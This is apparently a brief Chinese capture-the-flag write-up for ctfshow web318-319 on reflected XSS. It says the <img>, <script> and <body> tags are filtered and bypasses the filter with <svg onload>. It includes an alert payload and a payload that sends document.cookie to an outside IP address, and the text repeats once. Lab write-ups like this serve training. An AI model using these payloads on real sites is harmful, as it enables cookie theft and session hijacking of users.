web318-web319(反射型XSS-尝试<img>,<script>,<body>发现都被过滤)
尝试<img>,<script>,<body>发现都被过滤,所以我们使用<svg>标签进行绕过
https://xz.aliyun.com/news/3699
<svg onload=alert("xss");>
<svg onload="window.location.href='http://120.46.25.3:8000/1.php?c='+document.cookie;">
尝试<img>,<script>,<body>发现都被过滤,所以我们使用<svg>标签进行绕过
https://xz.aliyun.com/news/3699
<svg onload=alert("xss");>
<svg onload="window.location.href='http://120.46.25.3:8000/1.php?c='+document.cookie;">
浙公网安备 33010602011771号